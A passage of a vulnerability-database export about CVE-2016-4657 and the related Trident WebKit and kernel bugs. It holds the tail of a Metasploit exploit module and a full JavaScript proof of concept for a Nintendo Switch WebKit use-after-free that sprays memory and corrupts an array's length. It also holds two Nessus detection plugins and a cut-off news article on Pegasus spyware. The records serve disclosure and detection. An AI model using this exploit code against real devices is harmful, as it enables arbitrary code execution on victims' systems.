0xffffffff;\r\n mem0 = stale[0];\r\n mem1 = bck;\r\n mem2 = smsh;\r\n bufs.push(stale)\r\n if (smsh.length != 0x10) {\r\n smashed(stale[0]);\r\n }\r\n return;\r\n }\r\n }\r\n }\r\n setTimeout(function() {\r\n document.location.reload();\r\n }, 2000);\r\n }\r\n\r\ndgc();\r\nsetTimeout(go_, 200);\r\n</script>\r\n</body>\r\n</html>\r\n ^\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n end\r\n\r\nend", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44836/"}, {"lastseen": "2018-02-28T17:20:53", "description": "Nintendo Switch - WebKit Code Execution (PoC). CVE-2016-4657. Local exploit for Hardware platform", "published": "2017-03-12T00:00:00", "type": "exploitdb", "title": "Nintendo Switch - WebKit Code Execution (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-4657"], "modified": "2017-03-12T00:00:00", "id": "EDB-ID:44213", "href": "https://www.exploit-db.com/exploits/44213/", "sourceData": "<!doctype html>\r\n<html>\r\n <head>\r\n <title>CVE-2016-4657 Switch PoC</title>\r\n <style>\r\n body {font-size: 2em;}\r\n a {text-decoration: none; color: #000;}\r\n a:hover {color: #f00; font-weight: bold;}\r\n </style>\r\n </head>\r\n <body>\r\n <h1>CVE-2016-4657 Nintendo Switch PoC</h1>\r\n <ul>\r\n <li><a href=\\'javascript:go();\\'> go!</a></li>\r\n <li><a href=\\'javascript:document.location.reload();\\'> reload</a></li>\r\n </ul>\r\n <div id=\\'status\\'> waiting... click go.</div>\r\n\r\n <script>\r\n // display JS errors as alerts. Helps debugging.\r\n window.onerror = function(error, url, line) {\r\n alert(error+\\' URL:\\'+url+\\' L:\\'+line);\r\n };\r\n </script>\r\n <script>\r\n\r\n // based on jbme.qwertyoruiop.com\r\n // Thanks to:\r\n // + qwertyoruiop\r\n // + Retr0id\r\n // + Ando\r\n //\r\n // saelo\\'s phrack article is invaluable: http://www.phrack.org/papers/attacking_javascript_engines.html\r\n\r\n // garbage collection stuff\r\n var pressure = new Array(100);\r\n // do garbage collect\r\n dgc = function() {\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = new Uint32Array(0x10000);\r\n }\r\n for (var i = 0; i < pressure.length; i++) {\r\n pressure[i] = 0;\r\n }\r\n }\r\n\r\n\r\n // access to the overlapping Uint32Array\r\n var bufs = new Array(0x1000);\r\n // we will modify the vector of this\r\n var smash = new Uint32Array(0x10);\r\n // the array with the stale pointer\r\n var stale = 0;\r\n\r\n var _dview = null;\r\n // write 2x 32bit in a DataView and get the Float representation of it\r\n function u2d(low, hi) {\r\n if (!_dview) _dview = new DataView(new ArrayBuffer(16));\r\n _dview.setUint32(0, hi);\r\n _dview.setUint32(4, low);\r\n return _dview.getFloat64(0);\r\n }\r\n\r\n function go_() {\r\n // check if the length of the array smash changed already. if yes, bail out.\r\n if (smash.length != 0x10) return;\r\n\r\n // garbage collect\r\n dgc();\r\n\r\n // new array with 0x100 elements\r\n var arr = new Array(0x100);\r\n\r\n // new array buffer of length 0x1000\r\n var yolo = new ArrayBuffer(0x1000);\r\n\r\n // populate the arr with pointer to yolo and a number. not quite sure why.\r\n arr[0] = yolo;\r\n arr[1] = 0x13371337;\r\n\r\n // create an object whos toString function returns number 10 and messes with arr.\r\n var not_number = {};\r\n not_number.toString = function() {\r\n arr = null;\r\n props[\\\"stale\\\"][\\\"value\\\"] = null;\r\n\r\n // if bufs is already overlapping memory, bail out.\r\n if (bufs[0]) return 10;\r\n // really make sure garbage is collected\r\n // the array pointed at by arr should be gone now.\r\n for (var i = 0; i < 20; i++) {\r\n dgc();\r\n }\r\n // for the whole buf Array\r\n for (i = 0; i < bufs.length; i++) {\r\n // fill it with a lot of Uint32Arrays, hopefully allocated where arr was earlier\r\n bufs[i] = new Uint32Array(0x100 * 2)\r\n // for each element of that array\r\n for (k = 0; k < bufs[i].length;) {\r\n // set memory to 0x41414141 0xffff0000\r\n // basically spraying the JSValue 0xffff000041414141\r\n // which is the Integer 0x41414141\r\n // phrack: Integer FFFF:0000:IIII:IIII\r\n bufs[i][k++] = 0x41414141;\r\n bufs[i][k++] = 0xffff0000;\r\n }\r\n }\r\n return 10;\r\n };\r\n // define a new object with some properties\r\n var props = {\r\n p0: { value: 0 },\r\n p1: { value: 1 },\r\n p2: { value: 2 },\r\n p3: { value: 3 },\r\n p4: { value: 4 },\r\n p5: { value: 5 },\r\n p6: { value: 6 },\r\n p7: { value: 7 },\r\n p8: { value: 8 },\r\n // the length of this object is set to this object that does evil stuff with toString()\r\n length: { value: not_number },\r\n // the reference to the arr array. Which will later be freed.\r\n stale: { value: arr },\r\n after: { value: 666 }\r\n };\r\n // define a new target array\r\n var target = [];\r\n\r\n // TRIGGER BUG!\r\n // set the properties of the target based on the previously defined ones\r\n Object.defineProperties(target, props);\r\n\r\n // get a reference to the target stale property, which points to arr\r\n stale = target.stale;\r\n\r\n // make sure that the stale[0] points actually to the 0x41414141 data if not, we don\\'t wanna mess with it and try again\r\n if(stale[0]==0x41414141) {\r\n // stale[0] is now pointing at a fake Integer 0x41414141. Now make it 0x41414242\r\n stale[0] += 0x101;\r\n //stale[0] = 0x41414242;\r\n //document.getElementById(\\'status\\').innerText = \\'bug done.\\';\r\n // searching the whole memory that is overlaying the old arr. Looking for 0x41414242\r\n for (i = 0; i < bufs.length; i++) {\r\n for (k = 0; k < bufs[0].length; k++) {\r\n // Found the value! bufs[i][k] point now at the same memory as stale[0]\r\n if (bufs[i][k] == 0x41414242) {\r\n alert(\\'Overlapping Arrays found at bufs[\\'+i+\\'][\\'+k+\\']\\\\nsmash.length is still: 0x\\'+smash.length.toString(16));\r\n\r\n // create a new object. Will look kinda like this:\r\n // 0x0100150000000136 0x0000000000000000 <- fictional value\r\n // 0x0000000000000064 0x0000000000000000 <- [\\'a\\'],[\\'b\\']\r\n // 0x???????????????? 0x0000000000000100 <- [\\'c\\'],[\\'d\\']\r\n stale[0] = {\r\n \\'a\\': u2d(105, 0), // the JSObject properties ; 105 is the Structure ID of Uint32Array\r\n \\'b\\': u2d(0, 0),\r\n \\'c\\': smash, // var pointing at the struct of a Uint32Array(0x10)\r\n \\'d\\': u2d(0x100, 0)\r\n }\r\n\r\n alert(\\'created the JSObject.\\\\nstale[0] = \\'+stale[0]);\r\n\r\n // remember the original stale pointer, pointing at the object with the a,b,c,d properties\r\n stale[1] = stale[0];\r\n\r\n // now add 0x10 to the pointer of stale[0], which points now in the middle of the object.\r\n bufs[i][k] += 0x10;\r\n // check the type of stale[0].\r\n\r\n // removed the loop because it makes the exploit sooooooo unreliable\r\n // based on phrack paper - Predicting structure IDs (http://www.phrack.org/papers/attacking_javascript_engines.html)\r\n /*while(!(stale[0] instanceof Uint32Array)) {\r\n // if stale[0] is not a Uint32Array yet, increment the structureID guess\r\n structureID++;\r\n\r\n // assign the next structureID to the original object still referenced by stale[1]\r\n stale[1][\\'a\\'] = u2d(structureID, 0);\r\n }*/\r\n\r\n // Give some information. stale[0] should now be a Uint32Array\r\n alert(\\'misaligned the pointer to the JSObject.\\\\nstale[0] = \\'+stale[0]+\\'\\');\r\n\r\n // write to the 6th 32bit value of the memory pointed to by the crafted Uint32Array\r\n // which should point to the struct of smash, allowing us to overwrite the length of smash\r\n stale[0][6] = 0x1337;\r\n\r\n // check the length of smash is now.\r\n alert(\\'smash.length is now: 0x\\'+smash.length.toString(16));\r\n\r\n alert(\\'done!\\\\nswitch will probably crash now :O\\');\r\n return;\r\n }\r\n }\r\n }\r\n }\r\n document.getElementById(\\'status\\').innerText = \\' fail. refresh the page and try again...\\';\r\n setTimeout(function() {document.location.reload();}, 1000);\r\n }\r\n\r\n function go() {\r\n document.getElementById(\\'status\\').innerText = \\' go! \\';\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n dgc();\r\n setTimeout(go_, 500);\r\n }\r\n\r\n // if Switch browser is detected, auto start exploit\r\n if(navigator.userAgent.indexOf(\\'Nintendo Switch\\')>-1) {\r\n document.getElementById(\\'status\\').innerText = \\'Found Nintendo Switch! \\';\r\n setTimeout(go, 2000);\r\n }\r\n </script>\r\n </body>\r\n</html>", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/44213/"}], "nessus": [{"lastseen": "2021-01-01T03:25:53", "description": "The remote host is running a version of Mac OS X 10.10.5 or 10.11.6\nthat is missing a security update. It is therefore, affected by\nmultiple vulnerabilities in the Kernel component :\n\n - An unspecified flaw exists due to improper validation of\n user-supplied input. An attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to disclose kernel memory contents.\n (CVE-2016-4655)\n\n - An unspecified flaw exists due to improper validation of\n certain input. An attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel level\n privileges. (CVE-2016-4656)", "edition": 27, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-02T00:00:00", "title": "Mac OS X Multiple Vulnerabilities (Security Updates 2016-001 / 2016-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4656", "CVE-2016-4655"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2016-005.NASL", "href": "https://www.tenable.com/plugins/nessus/93317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93317);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/07/14 1:59:36\");\n\n script_cve_id(\"CVE-2016-4655\", \"CVE-2016-4656\");\n script_bugtraq_id(92651, 92652);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-09-01-2\");\n\n script_name(english:\"Mac OS X Multiple Vulnerabilities (Security Updates 2016-001 / 2016-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2016-001 and 2016-005.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a Mac OS X update that fixes multiple\nsecurity vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X 10.10.5 or 10.11.6\nthat is missing a security update. It is therefore, affected by\nmultiple vulnerabilities in the Kernel component :\n\n - An unspecified flaw exists due to improper validation of\n user-supplied input. An attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to disclose kernel memory contents.\n (CVE-2016-4655)\n\n - An unspecified flaw exists due to improper validation of\n certain input. An attacker can exploit this, by\n convincing a user to run a specially crafted\n application, to execute arbitrary code with kernel level\n privileges. (CVE-2016-4656)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207130\");\n # http://lists.apple.com/archives/security-announce/2016/Sep/msg00001.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?faffe2b4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2016-005 (OS X 10.10.5) / 2016-001 (OS X\n10.11.6) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WebKit not_number defineProperties UAF');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\n# Advisory states that update 2016-005 is available for 10.10.5 and update 2016-001 is available for 10.11.6\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\nif (!ereg(pattern:\"Mac OS X 10\\.(10\\.5|11\\.6)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.10.5 or Mac OS X 10.11.6\");\n\nif ( \"10.10.5\" >< os) patch = \"2016-005\";\nelse if ( \"10.11.6\" >< os ) patch = \"2016-001\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = egrep(pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\", string:packages);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = eregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:25:03", "description": "The version of Apple Safari installed on the remote Mac OS X host is\nprior to 9.1.3. It is, therefore, affected by a remote code execution\nvulnerability in WebKit due to a memory corruption issue. An\nunauthenticated, remote attacker can exploit this, by convincing a\nuser to visit a malicious website, to cause a denial of service\ncondition or execution of arbitrary code.", "edition": 31, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-09-19T00:00:00", "title": "Mac OS X : Apple Safari < 9.1.3 WebKit Memory Corruption RCE", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4657"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "MACOSX_SAFARI9_1_3.NASL", "href": "https://www.tenable.com/plugins/nessus/93593", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(93593);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-4657\");\n script_bugtraq_id(92653);\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2016-09-01-1\");\n\n script_name(english:\"Mac OS X : Apple Safari < 9.1.3 WebKit Memory Corruption RCE\");\n script_summary(english:\"Checks the Safari version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote host is affected by a remote\ncode execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apple Safari installed on the remote Mac OS X host is\nprior to 9.1.3. It is, therefore, affected by a remote code execution\nvulnerability in WebKit due to a memory corruption issue. An\nunauthenticated, remote attacker can exploit this, by convincing a\nuser to visit a malicious website, to cause a denial of service\ncondition or execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT207131\");\n # http://lists.apple.com/archives/security-announce/2016/Sep/msg00000.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dade65f4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple Safari version 9.1.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4657\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WebKit not_number defineProperties UAF');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:safari\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_Safari31.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Safari/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os) audit(AUDIT_OS_NOT, \"Mac OS X\");\n\nif (!ereg(pattern:\"Mac OS X 10\\.(9|10|11)([^0-9]|$)\", string:os)) audit(AUDIT_OS_NOT, \"Mac OS X 10.9 / 10.10 / 10.11\");\n\ninstalled = get_kb_item_or_exit(\"MacOSX/Safari/Installed\", exit_code:0);\npath = get_kb_item_or_exit(\"MacOSX/Safari/Path\", exit_code:1);\nversion = get_kb_item_or_exit(\"MacOSX/Safari/Version\", exit_code:1);\n\nfixed_version = \"9.1.3\";\n\nif (ver_compare(ver:version, fix:fixed_version, strict:FALSE) == -1)\n{\n report = report_items_str(\n report_items:make_array(\n \"Path\", path,\n \"Installed version\", version,\n \"Fixed version\", fixed_version\n ),\n ordered_fields:make_list(\"Path\", \"Installed version\", \"Fixed version\")\n );\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Safari\", version, path);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-15T13:32:23", "description": "A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 9.6, "vector": "AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2017-01-11T00:00:00", "title": "Ubuntu 16.04 LTS : webkit2gtk vulnerabilities (USN-3166-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-4762", "CVE-2016-4767", "CVE-2016-4734", "CVE-2016-4761", "CVE-2016-4759", "CVE-2016-4733", "CVE-2016-7578", "CVE-2016-4769", "CVE-2016-4768", "CVE-2016-4728", "CVE-2016-4613", "CVE-2016-4707", "CVE-2016-4764", "CVE-2016-4735", "CVE-2016-4760", "CVE-2016-4657", "CVE-2016-4666", "CVE-2016-4765"], "modified": "2017-01-11T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3166-1.NASL", "href": "https://www.tenable.com/plugins/nessus/96406", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3166-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(96406);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/07/14\");\n\n script_cve_id(\"CVE-2016-4613\", \"CVE-2016-4657\", \"CVE-2016-4666\", \"CVE-2016-4707\", \"CVE-2016-4728\", \"CVE-2016-4733\", \"CVE-2016-4734\", \"CVE-2016-4735\", \"CVE-2016-4759\", \"CVE-2016-4760\", \"CVE-2016-4761\", \"CVE-2016-4762\", \"CVE-2016-4764\", \"CVE-2016-4765\", \"CVE-2016-4767\", \"CVE-2016-4768\", \"CVE-2016-4769\", \"CVE-2016-7578\");\n script_xref(name:\"USN\", value:\"3166-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS : webkit2gtk vulnerabilities (USN-3166-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3166-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected libjavascriptcoregtk-4.0-18 and / or\nlibwebkit2gtk-4.0-37 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'WebKit not_number defineProperties UAF');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/01/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2020 Canonical, Inc. / NASL script (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libjavascriptcoregtk-4.0-18\", pkgver:\"2.14.2-0ubuntu0.16.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libwebkit2gtk-4.0-37\", pkgver:\"2.14.2-0ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4.0-18 / libwebkit2gtk-4.0-37\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T09:18:08", "bulletinFamily": "info", "cvelist": ["CVE-2016-4654", "CVE-2016-4656", "CVE-2016-4655"], "description": "[![apple-mac-os-x-update-download](https://1.bp.blogspot.com/-ZlNRQETCOiY/V8lQw44JN0I/AAAAAAAApXg/7Cv0PWtyWS47SrjrBMh2WAxO3KEj9JCuACLcB/s1600/apple-mac-os-x-update-download.png)](<https://1.bp.blogspot.com/-ZlNRQETCOiY/V8lQw44JN0I/AAAAAAAApXg/7Cv0PWtyWS47SrjrBMh2WAxO3KEj9JCuACLcB/s1600/apple-mac-os-x-update-download.png>)\n\nIf you own a Mac laptop or desktop, you need to update your system right now. \n \nIt turns out that the critical zero-day security vulnerabilities disclosed last week, which targeted iPhone and iPad users, affect Mac users as well. \n \nLate last week, Apple rolled out iOS 9.3.5 update to patch a total of [three zero-day vulnerabilities](<https://thehackernews.com/2016/08/apple-security-update.html>) that hackers could have used to remotely gain control of an iPhone by simply making the victim click a link. \n \nDubbed \"Trident,\" the security holes were used to create spyware (surveillance malware) called '[Pegasus](<https://thehackernews.com/2016/08/apple-security-update.html>)' that was apparently used to target human rights activist Ahmed Mansoor in the United Arab Emirates. \n \nPegasus could allow an attacker to access an incredible amount of data on a target victim, including text messages, calendar entries, emails, WhatsApp messages, user's location, microphone. \n \nPegasus Spyware could even allow an attacker to fully download victim's passwords and steal the stored list of WiFi networks, as well as passwords the device connected to. \n \nApple is now patching the same \"Trident\" bugs in Safari web browser on its desktop operating system, with [urgent security updates](<https://support.apple.com/en-us/HT207130>) for Safari 9 as well as OS X Yosemite and OS X El Capitan. \n \nHowever, this is not a surprise because iOS and OS X, and mobile and desktop version of Safari browser share much of the same codebase. Therefore, zero-days in Apple\u2019s iOS showed up in OS X as well. \n \nPegasus exploit takes advantage of Trident bugs to remotely jailbreak and install a collection of spying software onto a victim's device, without the user\u2019s knowledge. \n \nOne of the key tools of the exploit takes advantage of a memory corruption bug in Safari WebKit, allowing hackers to deliver the malicious payload when a target victim clicks on a malicious link and initiate the process of overtaking the operating system. \n \nIn an advisory, Apple warned that visiting a \"maliciously crafted website\" via Safari browser could allow attackers to execute arbitrary code on a victim's computer. \n \nThe patch updates that Apple released on Thursday fix the nasty Trident bugs, including CVE-2016-4654, CVE-2016-4655, and CVE-2016-4656, which were initially discovered and reported by mobile security startup Lookout and the University of Toronto\u2019s Citizen Lab. \n \nBased on a link sent to UAE human rights activist Ahmed Mansoor, Lookout Security, and Citizen Lab traced the three programming blunders and its Pegasus spyware kit to Israeli \"cyber war\" organization [NSO 